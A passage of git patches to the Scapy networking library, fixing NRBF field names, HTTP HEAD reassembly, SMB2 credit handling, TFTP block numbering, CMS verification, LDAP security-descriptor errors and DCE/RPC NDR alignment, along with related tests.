super(NRBFMemberPrimitiveUnTyped, self).copy() - pkt.type = self.type + pkt.primtype = self.primtype return pkt @property def PrimitiveType(self): - return self.type + return self.primtype def default_payload_class(self, payload): return conf.padding_layer @@ -848,7 +848,7 @@ def _values_singleprim_cb(pkt, lst, cur, remain): return None return functools.partial( NRBFMemberPrimitiveUnTyped, - type=PrimitiveTypeEnum(pkt.PrimitiveTypeEnum), + primtype=PrimitiveTypeEnum(pkt.PrimitiveTypeEnum), ) diff --git a/test/scapy/layers/msnrtp.uts b/test/scapy/layers/msnrtp.uts index 0add8591ac3..04a9e46e1a8 100644 --- a/test/scapy/layers/msnrtp.uts +++ b/test/scapy/layers/msnrtp.uts @@ -80,7 +80,7 @@ pkt = NRBF( ], AdditionalInfos=[ NRBFAdditionalInfo( - type=BinaryTypeEnum.SystemClass, + bintype=BinaryTypeEnum.SystemClass, Value=NRBFClassTypeInfo( TypeName=NRBFLengthPrefixedString( String=b"System.Data.SerializationFormat" @@ -89,23 +89,23 @@ pkt = NRBF( ) ), NRBFAdditionalInfo( - type=BinaryTypeEnum.Primitive, + bintype=BinaryTypeEnum.Primitive, Value=PrimitiveTypeEnum.Boolean, ), NRBFAdditionalInfo( - type=BinaryTypeEnum.Primitive, + bintype=BinaryTypeEnum.Primitive, Value=PrimitiveTypeEnum.Int32, ), NRBFAdditionalInfo( - type=BinaryTypeEnum.Primitive, + bintype=BinaryTypeEnum.Primitive, Value=PrimitiveTypeEnum.Boolean, ), NRBFAdditionalInfo( - type=BinaryTypeEnum.Primitive, + bintype=BinaryTypeEnum.Primitive, Value=PrimitiveTypeEnum.Int32, ), NRBFAdditionalInfo( - type=BinaryTypeEnum.PrimitiveArray, + bintype=BinaryTypeEnum.PrimitiveArray, Value=PrimitiveTypeEnum.Byte, ), ], @@ -121,12 +121,12 @@ pkt = NRBF( ], BinaryTypeEnums=[BinaryTypeEnum.Primitive], AdditionalInfos=[ - NRBFAdditionalInfo(type=BinaryTypeEnum.Primitive, + NRBFAdditionalInfo(bintype=BinaryTypeEnum.Primitive, Value=PrimitiveTypeEnum.Int32), ], LibraryId=2, Members=[ - NRBFMemberPrimitiveUnTyped(type=PrimitiveTypeEnum.Int32, Value=1) + NRBFMemberPrimitiveUnTyped(primtype=PrimitiveTypeEnum.Int32, Value=1) ], ), NRBFBinaryObjectString( @@ -135,11 +135,11 @@ pkt = NRBF( ), NRBFMemberReference(IdRef=4), NRBFMemberReference(IdRef=4), - NRBFMemberPrimitiveUnTyped(type=PrimitiveTypeEnum.Boolean, Value=0), - NRBFMemberPrimitiveUnTyped(type=PrimitiveTypeEnum.Int32, Value=1033), - NRBFMemberPrimitiveUnTyped(type=PrimitiveTypeEnum.Boolean, Value=0), + NRBFMemberPrimitiveUnTyped(primtype=PrimitiveTypeEnum.Boolean, Value=0), + NRBFMemberPrimitiveUnTyped(primtype=PrimitiveTypeEnum.Int32, Value=1033), + NRBFMemberPrimitiveUnTyped(primtype=PrimitiveTypeEnum.Boolean, Value=0), NRBFObjectNull(), - NRBFMemberPrimitiveUnTyped(type=PrimitiveTypeEnum.Int32, Value=1), + NRBFMemberPrimitiveUnTyped(primtype=PrimitiveTypeEnum.Int32, Value=1), NRBFMemberReference(IdRef=5), ], ), From 17ff3f009d21cb5ba3134cdea36f39922a69d8bd Mon Sep 17 00:00:00 2001 From: Gabriel <10530980+gpotter2@users.noreply.github.com> Date: Sun, 8 Feb 2026 17:29:03 +0100 Subject: [PATCH 1578/1632] HTTP: fix forwarding of HEAD sessions (#4908) --- scapy/fwdmachine.py | 1 + scapy/layers/http.py | 18 +++++++++++++----- test/scapy/layers/http.uts | 10 +++++----- 3 files changed, 19 insertions(+), 10 deletions(-) diff --git a/scapy/fwdmachine.py b/scapy/fwdmachine.py index 023c002354c..10c2f6a4e92 100644 --- a/scapy/fwdmachine.py +++ b/scapy/fwdmachine.py @@ -414,6 +414,7 @@ def cb_sni(sock, server_name, _): # Wrap the sockets sock = self.sockcls(sock, self.cls) ss = self.sockcls(ss, self.cls) + sock.streamsession = ss.streamsession try: while True: # Listen on both ends of the connection diff --git a/scapy/layers/http.py b/scapy/layers/http.py index 26fc3727eb0..88930d569c4 100644 --- a/scapy/layers/http.py +++ b/scapy/layers/http.py @@ -649,7 +649,7 @@ def dispatch_hook(cls, _pkt=None, *args, **kargs): # tcp_reassemble is used by TCPSession in session.py @classmethod - def tcp_reassemble(cls, data, metadata, _): + def tcp_reassemble(cls, data, metadata, session): detect_end = metadata.get("detect_end", None) is_unknown = metadata.get("detect_unknown", True) # General idea of the following is explained at @@ -674,8 +674,12 @@ def tcp_reassemble(cls, data, metadata, _): # use it. When the total size of the frags is high enough, # we have the packet + if session.pop("head_request", False): + # Answer to a HEAD request. + detect_end = lambda dat: dat.find(b"\r\n\r\n") + # Subtract the length of the "HTTP*" layer - if http_packet.payload.payload or length == 0: + elif http_packet.payload.payload or length == 0: http_length = len(data) - http_packet.payload._original_len detect_end = lambda dat: len(dat) - http_length >= length else: @@ -693,13 +697,18 @@ def tcp_reassemble(cls, data, metadata, _): if chunked: detect_end = lambda dat: dat.endswith(b"0\r\n\r\n") # HTTP Requests that do not have any content, - # end with a double CRLF. Same for HEAD responses + # end with a double CRLF. elif isinstance(http_packet.payload, cls.clsreq): detect_end = lambda dat: dat.endswith(b"\r\n\r\n") # In case we are handling a HTTP Request, # we want to continue assessing the data, # to handle requests with a body (POST) metadata["detect_unknown"] = True + if ( + isinstance(http_packet.payload, cls.clsreq) + and http_packet.Method == b"HEAD" + ): + session["head_request"] = True elif is_response and http_packet.Status_Code == b"101": # If it's an upgrade response, it may also hold a # different protocol data. @@ -888,8 +897,7 @@ def request( self._connect_or_reuse(host, port=port, tls=tls, timeout=timeout) # Build request - if ((tls and port != 443) or - (not tls and port != 80)): + if (tls and port != 443) or (not tls and port != 80): host_hdr = "%s:%d" % (host, port) else: host_hdr = host diff --git a/test/scapy/layers/http.uts b/test/scapy/layers/http.uts index 2d2093b976d..541200da006 100644 --- a/test/scapy/layers/http.uts +++ b/test/scapy/layers/http.uts @@ -90,11 +90,11 @@ assert HTTPRequest in a[3] assert a[3].Method == b"HEAD" assert a[3].User_Agent == b'curl/7.88.1' -assert HTTPResponse in a[6] -assert a[6].Content_Type == b'text/html; charset=UTF-8' -assert a[6].Expires == b'Mon, 01 Apr 2024 22:25:38 GMT' -assert a[6].Reason_Phrase == b'Moved Permanently' -assert a[6].X_Frame_Options == b"SAMEORIGIN" +assert HTTPResponse in a[5] +assert a[5].Content_Type == b'text/html; charset=UTF-8' +assert a[5].Expires == b'Mon, 01 Apr 2024 22:25:38 GMT' +assert a[5].Reason_Phrase == b'Moved Permanently' +assert a[5].X_Frame_Options == b"SAMEORIGIN" = HTTP build with 'chunked' content type From 03c362c46c04ea11e8cfea4ea9229eec9f7f0d70 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Sun, 8 Feb 2026 17:43:20 +0100 Subject: [PATCH 1579/1632] Add warning suppression in docs conf. (#4899) Co-authored-by: Nils Weiss --- doc/scapy/conf.py | 2 ++ 1 file changed, 2 insertions(+) diff --git a/doc/scapy/conf.py b/doc/scapy/conf.py index be9480fb2f0..04d54f9aef4 100644 --- a/doc/scapy/conf.py +++ b/doc/scapy/conf.py @@ -193,3 +193,5 @@ '', 'Miscellaneous'), ] + +suppress_warnings = ["app.add_directive"] \ No newline at end of file From 548c7eb8767ed568341f257f5512f54b42f59904 Mon Sep 17 00:00:00 2001 From: Gabriel <10530980+gpotter2@users.noreply.github.com> Date: Sun, 8 Feb 2026 17:43:43 +0100 Subject: [PATCH 1580/1632] Various SMB2 fixes (#4907) * SMB2: fix credit calculation on 3.1.1 * Cert: allow external content validation in CMS * LDAPHero: don't crash when SD isn't readable * TFTP: fix Automatons when blocksize > 65536 --- scapy/layers/smb2.py | 2 ++ scapy/layers/smbclient.py | 32 ++++++++++++++++++++++---------- scapy/layers/tftp.py | 12 +++++++++--- scapy/layers/tls/cert.py | 9 ++++++++- scapy/modules/ldaphero.py | 8 +++++++- scapy/supersocket.py | 22 +++++++++++++--------- 6 files changed, 61 insertions(+), 24 deletions(-) diff --git a/scapy/layers/smb2.py b/scapy/layers/smb2.py index 3b4e650c9d7..fcfb3702b26 100644 --- a/scapy/layers/smb2.py +++ b/scapy/layers/smb2.py @@ -4751,6 +4751,8 @@ def recv(self, x=None): and not smbh._decrypted # - MessageId is 0xFFFFFFFFFFFFFFFF and smbh.MID != 0xFFFFFFFFFFFFFFFF + # - Message is not ECHO request + and smbh.Command != 0x000D # - Status in the SMB2 header is STATUS_PENDING and smbh.Status != 0x00000103 ): diff --git a/scapy/layers/smbclient.py b/scapy/layers/smbclient.py index 68bdc30d4c8..d143cd29a01 100644 --- a/scapy/layers/smbclient.py +++ b/scapy/layers/smbclient.py @@ -155,6 +155,8 @@ def __init__(self, sock, ssp=None, *args, **kwargs): self.NegotiateCapabilities = None self.GUID = RandUUID()._fix() self.SequenceWindow = (0, 0) # keep track of allowed MIDs + self.CurrentCreditCount = 0 + self.MaxCreditCount = 128 if ssp is None: # We got no SSP. Assuming the server allows anonymous ssp = SPNEGOSSP( @@ -232,8 +234,12 @@ def send(self, pkt): else: # "For all other requests, the client MUST set CreditCharge to 1" pkt.CreditCharge = 1 - # [MS-SMB2] 3.2.4.1.2 - pkt.CreditRequest = pkt.CreditCharge + 1 # this code is a bit lazy + # Keep track of our credits + self.CurrentCreditCount -= pkt.CreditCharge + # [MS-SMB2] note <110> + # "The Windows-based client will request credits up to a configurable + # maximum of 128 by default." + pkt.CreditRequest = self.MaxCreditCount - self.CurrentCreditCount # Get first available message ID: [MS-SMB2] 3.2.4.1.3 and 3.2.4.1.5 pkt.MID = self.SequenceWindow[0] return super(SMB_Client, self).send(pkt) @@ -466,6 +472,8 @@ def update_smbheader(self, pkt): self.smb_header.SessionId = pkt.SessionId self.smb_header.TID = pkt.TID self.smb_header.PID = pkt.PID + # Update credits + self.CurrentCreditCount += pkt.CreditRequest # [MS-SMB2] 3.2.5.1.4 self.SequenceWindow = ( self.SequenceWindow[0] + max(pkt.CreditCharge, 1), @@ -675,8 +683,8 @@ def __init__(self, smbsock, use_ioctl=True, timeout=3): self.timeout = timeout if not self.ins.atmt.smb_sock_ready.wait(timeout=timeout): # If we have a SSP, tell it we failed. - if self.ins.atmt.session.sspcontext: - self.ins.atmt.session.sspcontext.clifailure() + if self.session.sspcontext: + self.session.sspcontext.clifailure() raise TimeoutError( "The SMB handshake timed out ! (enable debug=1 for logs)" ) @@ -897,7 +905,7 @@ def read_request(self, FileId, Length, Offset=0): Offset=Offset, ), verbose=0, - timeout=self.timeout, + timeout=self.timeout * 10, ) if not resp: raise ValueError("ReadRequest timed out !") @@ -916,7 +924,7 @@ def write_request(self, Data, FileId, Offset=0): Offset=Offset, ), verbose=0, - timeout=self.timeout, + timeout=self.timeout * 10, ) if not resp: raise ValueError("WriteRequest timed out !") @@ -1024,7 +1032,7 @@ def send(self, x): # Detect if DCE/RPC is fragmented. Then we must use Read/Write is_frag = x.pfc_flags & 3 != 3 - if self.use_ioctl and not is_frag: + if self.use_ioctl and not is_frag and self.session.Dialect >= 0x0210: # Use IOCTLRequest pkt = SMB2_IOCTL_Request( FileId=self.PipeFileId, @@ -1122,6 +1130,7 @@ def __init__( HashNt: bytes = None, HashAes256Sha96: bytes = None, HashAes128Sha96: bytes = None, + use_krb5ccname: bool = False, port: int = 445, timeout: int = 5, debug: int = 0, @@ -1150,6 +1159,7 @@ def __init__( ST=ST, KEY=KEY, kerberos_required=kerberos_required, + use_krb5ccname=use_krb5ccname, ) else: # Guest mode @@ -1314,7 +1324,7 @@ def shares_output(self, results): """ print(pretty_list(results, [("ShareName", "ShareType", "Comment")])) - @CLIUtil.addcommand() + @CLIUtil.addcommand(spaces=True) def use(self, share): """ Open a share @@ -1558,6 +1568,7 @@ def _get_file(self, file, fd): # Get pwd of the ls fpath = self.pwd / file self.smbsock.set_TID(self.current_tree) + # Open file fileId = self.smbsock.create_request( self.normalize_path(fpath), @@ -1567,6 +1578,7 @@ def _get_file(self, file, fd): ] + self.extra_create_options, ) + # Get the file size info = FileAllInformation( self.smbsock.query_info( @@ -1577,6 +1589,7 @@ def _get_file(self, file, fd): ) length = info.StandardInformation.EndOfFile offset = 0 + # Read the file while length: lengthRead = min(self.smbsock.session.MaxReadSize, length) @@ -1585,6 +1598,7 @@ def _get_file(self, file, fd): ) offset += lengthRead length -= lengthRead + # Close the file self.smbsock.close_request(fileId) return offset @@ -1811,8 +1825,6 @@ def watch(self, folder): print(chg.sprintf("%.time%: %Action% %FileName%")) except KeyboardInterrupt: pass - # Close the file - self.smbsock.close_request(fileId) print("Cancelled.") @CLIUtil.addcommand(spaces=True) diff --git a/scapy/layers/tftp.py b/scapy/layers/tftp.py index a5ccb12af66..fcd925c3f57 100644 --- a/scapy/layers/tftp.py +++ b/scapy/layers/tftp.py @@ -409,7 +409,7 @@ def receive_data(self, pkt): @ATMT.action(receive_data) def ack_data(self): - self.last_packet = self.l3 / TFTP_ACK(block=self.blk) + self.last_packet = self.l3 / TFTP_ACK(block=self.blk % 65536) self.send(self.last_packet) @ATMT.state() @@ -516,11 +516,17 @@ def file_not_found(self): @ATMT.action(file_not_found) def send_error(self): - self.send(self.l3 / TFTP_ERROR(errorcode=1, errormsg=TFTP_Error_Codes[1])) # noqa: E501 + self.send(self.l3 / TFTP_ERROR( + errorcode=1, + errormsg=TFTP_Error_Codes[1], + )) @ATMT.state() def SEND_FILE(self): - self.send(self.l3 / TFTP_DATA(block=self.blk) / self.data[(self.blk - 1) * self.blksize:self.blk * self.blksize]) # noqa: E501 + self.send( + self.l3 / TFTP_DATA(block=self.blk % 65536) / + self.data[(self.blk - 1) * self.blksize:self.blk * self.blksize] + ) @ATMT.timeout(SEND_FILE, 3) def timeout_waiting_ack(self): diff --git a/scapy/layers/tls/cert.py b/scapy/layers/tls/cert.py index 4788c3d2a88..7f3e710d806 100644 --- a/scapy/layers/tls/cert.py +++ b/scapy/layers/tls/cert.py @@ -1819,6 +1819,7 @@ def verify( self, contentInfo: CMS_ContentInfo, eContentType: Optional[ASN1_OID] = None, + eContent: Optional[bytes] = None, ): """ Verify a CMS message against the list of trusted certificates, @@ -1826,6 +1827,7 @@ def verify( :param contentInfo: the ContentInfo whose signature to verify :param eContentType: if provided, verifies that the content type is valid + :param eContent: in PKCS 7.1, provide the content to verify """ if contentInfo.contentType.oidname != "id-signedData": raise ValueError("ContentInfo isn't signed !") @@ -1885,10 +1887,15 @@ def verify( if x.type.oidname == "messageDigest" ) + if signeddata.encapContentInfo.eContent is not None: + eContent = bytes(signeddata.encapContentInfo.eContent) + elif eContent is None: + raise ValueError("No eContent was provided !") + # Re-calculate hash h = signerInfo.digestAlgorithm.algorithm.oidname hash = hashes.Hash(_get_hash(h)) - hash.update(bytes(signeddata.encapContentInfo.eContent)) + hash.update(eContent) hashed_message = hash.finalize() if hashed_message != messageDigest: diff --git a/scapy/modules/ldaphero.py b/scapy/modules/ldaphero.py index dd518ec0ecc..9ade79eb5d9 100644 --- a/scapy/modules/ldaphero.py +++ b/scapy/modules/ldaphero.py @@ -751,7 +751,7 @@ def viewsec(self, *args): results = self.client.search( baseObject=item, scope=0, - attributes=["ntSecurityDescriptor"], + attributes=["nTSecurityDescriptor"], controls=[ LDAP_Control( controlType="1.2.840.113556.1.4.801", @@ -776,6 +776,12 @@ def viewsec(self, *args): nTSecurityDescriptor = SECURITY_DESCRIPTOR( results[item]["nTSecurityDescriptor"][0] ) + except KeyError: + self.tprint( + "Security Descriptor could NOT be read ! (Access denied?)", + tags=["error"], + ) + return except LDAP_Exception as ex: self.tprint( "Error parsing the Security Descriptor: " + str(ex), diff --git a/scapy/supersocket.py b/scapy/supersocket.py index 9c5b74a3b52..628920b8a62 100644 --- a/scapy/supersocket.py +++ b/scapy/supersocket.py @@ -488,15 +488,19 @@ def recv(self, x=None, **kwargs): # type: (Optional[int], Any) -> Optional[Packet] if x is None: x = MTU - # Block but in PEEK mode - data = self.ins.recv(x, socket.MSG_PEEK) - if data == b"": - raise EOFError - x = len(data) - pkt = self.rcvcls(self._buf + data, self.metadata, self.streamsession) - if pkt is None: # Incomplete packet. - self._buf += self.ins.recv(x) - return self.recv(x) + + while True: + # Block but in PEEK mode + data = self.ins.recv(x, socket.MSG_PEEK) + if data == b"": + raise EOFError + x = len(data) + pkt = self.rcvcls(self._buf + data, self.metadata, self.streamsession) + if pkt is None: # Incomplete packet. + self._buf += self.ins.recv(x) + else: + break + self.metadata.clear() # Strip any madding pad = pkt.getlayer(conf.padding_layer) From fec8617090be86c375577c23b96718efa0f4c654 Mon Sep 17 00:00:00 2001 From: Gabriel <10530980+gpotter2@users.noreply.github.com> Date: Mon, 9 Feb 2026 06:50:05 +0100 Subject: [PATCH 1581/1632] DCE/RPC: minor fixes and tests (#4910) * Move DCE/RPC tests * Add 'HOST' to NCACN_NP * Prepare scapy-rpc tests * DCE/RPC: fix NDR64 trailing gap of inner conformant * DCE/RPC: rename ptr_pack to ptr_lvl * Update ept with latest compiled version --- scapy/layers/dcerpc.py | 58 +++++++++-- scapy/layers/msrpce/msdcom.py | 2 +- scapy/layers/msrpce/raw/ept.py | 118 +++++++++++++++++++--- scapy/layers/msrpce/raw/ms_dcom.py | 20 ++-- scapy/layers/msrpce/raw/ms_nrpc.py | 7 +- scapy/layers/msrpce/rpcclient.py | 1 + scapy/tools/UTscapy.py | 7 ++ test/configs/bsd.utsc | 4 +- test/configs/cryptography.utsc | 2 +- test/configs/linux.utsc | 1 + test/configs/scapy-rpc.utsc | 9 ++ test/configs/windows.utsc | 1 + test/configs/windows2.utsc | 1 + test/scapy/layers/{ => msrpce}/msdrsr.uts | 0 test/scapy/layers/msrpce/mslsad.uts | 38 +++++++ test/scapy/layers/{ => msrpce}/msnrpc.uts | 0 tox.ini | 1 + 17 files changed, 235 insertions(+), 35 deletions(-) create mode 100644 test/configs/scapy-rpc.utsc rename test/scapy/layers/{ => msrpce}/msdrsr.uts (100%) create mode 100644 test/scapy/layers/msrpce/mslsad.uts rename test/scapy/layers/{ => msrpce}/msnrpc.uts (100%) diff --git a/scapy/layers/dcerpc.py b/scapy/layers/dcerpc.py index 7174e59993b..39ea79a0636 100644 --- a/scapy/layers/dcerpc.py +++ b/scapy/layers/dcerpc.py @@ -1943,9 +1943,19 @@ class NDRPacketField(NDRConstructedType, NDRAlign): def __init__(self, name, default, pkt_cls, **kwargs): self.DEPORTED_CONFORMANTS = pkt_cls.DEPORTED_CONFORMANTS self.fld = _NDRPacketField(name, default, pkt_cls=pkt_cls, **kwargs) + + # The inner _NDRPacketPadField handles NDR64's trailing gap in + # the case where there a no inner conformants (see [MS-RPCE] 2.2.5.3.4.1) + if self.DEPORTED_CONFORMANTS: + innerfld = self.fld + else: + innerfld = _NDRPacketPadField(self.fld, align=pkt_cls.ALIGNMENT) + + # C706 14.3.2 Alignment of Constructed Types is handled by the + # NDRAlign below. NDRAlign.__init__( self, - _NDRPacketPadField(self.fld, align=pkt_cls.ALIGNMENT), + innerfld, align=pkt_cls.ALIGNMENT, ) NDRConstructedType.__init__(self, pkt_cls.fields_desc) @@ -1996,11 +2006,12 @@ class _NDRPacketListField(NDRConstructedType, PacketListField): islist = 1 holds_packets = 1 - __slots__ = ["ptr_pack", "fld"] + __slots__ = ["ptr_lvl", "fld"] def __init__(self, name, default, pkt_cls, **kwargs): - self.ptr_pack = kwargs.pop("ptr_pack", False) - if self.ptr_pack: + self.ptr_lvl = kwargs.pop("ptr_lvl", False) + if self.ptr_lvl: + # TODO: support more than 1 level ? self.fld = NDRFullEmbPointerField(NDRPacketField("", None, pkt_cls)) else: self.fld = NDRPacketField("", None, pkt_cls) @@ -2042,7 +2053,6 @@ class NDRFieldListField(NDRConstructedType, FieldListField): islist = 1 def __init__(self, *args, **kwargs): - kwargs.pop("ptr_pack", None) # TODO: unimplemented if "length_is" in kwargs: kwargs["count_from"] = kwargs.pop("length_is") elif "size_is" in kwargs: @@ -2098,6 +2108,9 @@ def __init__(self, *args, **kwargs): kwargs["length_from"] = length_is elif self.COUNT_FROM: kwargs["count_from"] = length_is + # TODO: For now, we do nothing with max_is + if "max_is" in kwargs: + kwargs.pop("max_is") super(_NDRVarField, self).__init__(*args, **kwargs) def getfield(self, pkt, s): @@ -2221,13 +2234,23 @@ def __init__(self, *args, **kwargs): kwargs["length_from"] = size_is elif self.COUNT_FROM: kwargs["count_from"] = size_is + # TODO: For now, we do nothing with max_is + if "max_is" in kwargs: + kwargs.pop("max_is") super(_NDRConfField, self).__init__(*args, **kwargs) def getfield(self, pkt, s): # [C706] - 14.3.7 Structures Containing Arrays fmt = _e(pkt.ndrendian) + ["I", "Q"][pkt.ndr64] if self.conformant_in_struct: - return super(_NDRConfField, self).getfield(pkt, s) + # [MS-RPCE] 2.2.5.3.4.2 Structure Containing a Conformant Array + # Padding is here: just before the Conformant content + return NDRAlign( + super(_NDRConfField, self), + align=pkt.ALIGNMENT, + ).getfield(pkt, s) + + # The max count is aligned as a primitive type remain, max_count = NDRAlign(Field("", 0, fmt=fmt), align=(4, 8)).getfield( pkt, s ) @@ -2238,7 +2261,12 @@ def getfield(self, pkt, s): def addfield(self, pkt, s, val): if self.conformant_in_struct: - return super(_NDRConfField, self).addfield(pkt, s, val) + # [MS-RPCE] 2.2.5.3.4.2 Structure Containing a Conformant Array + # Padding is here: just before the Conformant content + return NDRAlign(super(_NDRConfField, self), align=pkt.ALIGNMENT).addfield( + pkt, s, val + ) + if self.CONFORMANT_STRING and not isinstance(val, NDRConformantString): raise ValueError( "Expected NDRConformantString in %s. You are using it wrong!" @@ -2385,6 +2413,22 @@ class NDRConfStrLenFieldUtf16(_NDRConfField, _NDRValueOf, StrLenFieldUtf16, _NDR LENGTH_FROM = True +class NDRVarStrNullField(_NDRVarField, _NDRValueOf, StrNullField): + """ + NDR Varying StrNullField + """ + + NULLFIELD = True + + +class NDRVarStrNullFieldUtf16(_NDRVarField, _NDRValueOf, StrNullFieldUtf16, _NDRUtf16): + """ + NDR Varying StrNullFieldUtf16 + """ + + NULLFIELD = True + + class NDRVarStrLenField(_NDRVarField, StrLenField): """ NDR Varying StrLenField diff --git a/scapy/layers/msrpce/msdcom.py b/scapy/layers/msrpce/msdcom.py index cc4208acc4a..a6cadfe5008 100644 --- a/scapy/layers/msrpce/msdcom.py +++ b/scapy/layers/msrpce/msdcom.py @@ -358,7 +358,7 @@ class PropsOutInfo(NDRPacket): [], MInterfacePointer, size_is=lambda pkt: pkt.cIfs, - ptr_pack=True, + ptr_lvl=1, ) ), ] diff --git a/scapy/layers/msrpce/raw/ept.py b/scapy/layers/msrpce/raw/ept.py index 9a3f3b60271..33c0cde4984 100644 --- a/scapy/layers/msrpce/raw/ept.py +++ b/scapy/layers/msrpce/raw/ept.py @@ -3,8 +3,8 @@ # See https://scapy.net/ for more information # Copyright (C) Gabriel Potter -# ept.idl compiled on 06/07/2025 -# This file is a stripped version ! Use scapy-rpc for the full. +# This is from [MS-RPCE] and [C706] Appendix O + """ RPC definitions for the following interfaces: - ept (v3.0): e1af8308-5d1f-11c9-91a4-08002b14a0fa @@ -17,6 +17,8 @@ from scapy.layers.dcerpc import ( NDRPacket, DceRpcOp, + NDRByteField, + NDRConfPacketListField, NDRConfStrLenField, NDRConfVarPacketListField, NDRContextHandle, @@ -40,17 +42,8 @@ class UUID(NDRPacket): ] -class RPC_IF_ID(NDRPacket): - ALIGNMENT = (4, 4) - fields_desc = [ - NDRPacketField("Uuid", UUID(), UUID), - NDRShortField("VersMajor", 0), - NDRShortField("VersMinor", 0), - ] - - class twr_p_t(NDRPacket): - ALIGNMENT = (4, 8) + ALIGNMENT = (4, 4) DEPORTED_CONFORMANTS = ["tower_octet_string"] fields_desc = [ NDRIntField("tower_length", None, size_of="tower_octet_string"), @@ -72,6 +65,42 @@ class ept_entry_t(NDRPacket): ] +class ept_insert_Request(NDRPacket): + fields_desc = [ + NDRIntField("num_ents", None, size_of="entries"), + NDRConfPacketListField( + "entries", [], ept_entry_t, size_is=lambda pkt: pkt.num_ents + ), + NDRIntField("replace", 0), + ] + + +class ept_insert_Response(NDRPacket): + fields_desc = [NDRIntField("status", 0)] + + +class ept_delete_Request(NDRPacket): + fields_desc = [ + NDRIntField("num_ents", None, size_of="entries"), + NDRConfPacketListField( + "entries", [], ept_entry_t, size_is=lambda pkt: pkt.num_ents + ), + ] + + +class ept_delete_Response(NDRPacket): + fields_desc = [NDRIntField("status", 0)] + + +class RPC_IF_ID(NDRPacket): + ALIGNMENT = (4, 4) + fields_desc = [ + NDRPacketField("Uuid", UUID(), UUID), + NDRShortField("VersMajor", 0), + NDRShortField("VersMinor", 0), + ] + + class ept_lookup_Request(NDRPacket): fields_desc = [ NDRIntField("inquiry_type", 0), @@ -117,15 +146,78 @@ class ept_map_Response(NDRPacket): twr_p_t, size_is=lambda pkt: pkt.max_towers, length_is=lambda pkt: pkt.num_towers, - ptr_pack=True, + ptr_lvl=1, ), NDRIntField("status", 0), ] +class ept_lookup_handle_free_Request(NDRPacket): + fields_desc = [NDRPacketField("entry_handle", NDRContextHandle(), NDRContextHandle)] + + +class ept_lookup_handle_free_Response(NDRPacket): + fields_desc = [ + NDRPacketField("entry_handle", NDRContextHandle(), NDRContextHandle), + NDRIntField("status", 0), + ] + + +class uuid_t(NDRPacket): + ALIGNMENT = (4, 4) + fields_desc = [ + NDRIntField("time_low", 0), + NDRShortField("time_mid", 0), + NDRShortField("time_hi_and_version", 0), + NDRByteField("clock_seq_hi_and_reserved", 0), + NDRByteField("clock_seq_low", 0), + StrFixedLenField("node", "", length=6), + ] + + +class ept_inq_object_Request(NDRPacket): + fields_desc = [] + + +class ept_inq_object_Response(NDRPacket): + fields_desc = [ + NDRPacketField("ept_object", uuid_t(), uuid_t), + NDRIntField("status", 0), + ] + + +class uuid_p_t(NDRPacket): + ALIGNMENT = (4, 4) + fields_desc = [ + NDRIntField("time_low", 0), + NDRShortField("time_mid", 0), + NDRShortField("time_hi_and_version", 0), + NDRByteField("clock_seq_hi_and_reserved", 0), + NDRByteField("clock_seq_low", 0), + StrFixedLenField("node", "", length=6), + ] + + +class ept_mgmt_delete_Request(NDRPacket): + fields_desc = [ + NDRIntField("object_speced", 0), + NDRPacketField("object", uuid_p_t(), uuid_p_t), + NDRPacketField("tower", twr_p_t(), twr_p_t), + ] + + +class ept_mgmt_delete_Response(NDRPacket): + fields_desc = [NDRIntField("status", 0)] + + EPT_OPNUMS = { + 0: DceRpcOp(ept_insert_Request, ept_insert_Response), + 1: DceRpcOp(ept_delete_Request, ept_delete_Response), 2: DceRpcOp(ept_lookup_Request, ept_lookup_Response), 3: DceRpcOp(ept_map_Request, ept_map_Response), + 4: DceRpcOp(ept_lookup_handle_free_Request, ept_lookup_handle_free_Response), + 5: DceRpcOp(ept_inq_object_Request, ept_inq_object_Response), + 6: DceRpcOp(ept_mgmt_delete_Request, ept_mgmt_delete_Response), } register_dcerpc_interface( name="ept", diff --git a/scapy/layers/msrpce/raw/ms_dcom.py b/scapy/layers/msrpce/raw/ms_dcom.py index 33240f3601e..5dede93fc20 100644 --- a/scapy/layers/msrpce/raw/ms_dcom.py +++ b/scapy/layers/msrpce/raw/ms_dcom.py @@ -64,7 +64,7 @@ class GUID(NDRPacket): class ORPC_EXTENT(NDRPacket): - ALIGNMENT = (4, 8) + ALIGNMENT = (4, 4) DEPORTED_CONFORMANTS = ["data"] fields_desc = [ NDRPacketField("id", GUID(), GUID), @@ -89,7 +89,7 @@ class ORPC_EXTENT_ARRAY(NDRPacket): [], ORPC_EXTENT, size_is=lambda pkt: ((pkt.size + 1) & (~1)), - ptr_pack=True, + ptr_lvl=1, ) ), ] @@ -109,7 +109,7 @@ class ORPCTHIS(NDRPacket): class MInterfacePointer(NDRPacket): - ALIGNMENT = (4, 8) + ALIGNMENT = (4, 4) DEPORTED_CONFORMANTS = ["abData"] fields_desc = [ NDRIntField("ulCntData", None, size_of="abData"), @@ -130,7 +130,7 @@ class ORPCTHAT(NDRPacket): class DUALSTRINGARRAY(NDRPacket): - ALIGNMENT = (4, 8) + ALIGNMENT = (2, 2) DEPORTED_CONFORMANTS = ["aStringArray"] fields_desc = [ NDRShortField("wNumEntries", None, size_of="aStringArray"), @@ -155,7 +155,11 @@ class RemoteActivation_Request(NDRPacket): NDRIntField("ClientImpLevel", 0), NDRIntField("Mode", 0), NDRIntField("Interfaces", None, size_of="pIIDs"), - NDRConfPacketListField("pIIDs", [], GUID, size_is=lambda pkt: pkt.Interfaces), + NDRFullPointerField( + NDRConfPacketListField( + "pIIDs", [], GUID, size_is=lambda pkt: pkt.Interfaces + ) + ), NDRShortField("cRequestedProtseqs", None, size_of="aRequestedProtseqs"), NDRConfFieldListField( "aRequestedProtseqs", @@ -182,7 +186,7 @@ class RemoteActivation_Response(NDRPacket): [], MInterfacePointer, size_is=lambda pkt: pkt.Interfaces, - ptr_pack=True, + ptr_lvl=1, ), NDRConfFieldListField( "pResults", [], NDRSignedIntField("", 0), size_is=lambda pkt: pkt.Interfaces @@ -414,7 +418,7 @@ class RemQueryInterface_Request(NDRPacket): class RemQueryInterface_Response(NDRPacket): fields_desc = [ NDRConfPacketListField( - "ppQIResults", [], REMQIRESULT, size_is=lambda pkt: pkt.cIids, ptr_pack=True + "ppQIResults", [], REMQIRESULT, size_is=lambda pkt: pkt.cIids, ptr_lvl=1 ), NDRIntField("status", 0), ] @@ -491,7 +495,7 @@ class RemQueryInterface2_Response(NDRPacket): "phr", [], NDRSignedIntField("", 0), size_is=lambda pkt: pkt.cIids ), NDRConfPacketListField( - "ppMIF", [], MInterfacePointer, 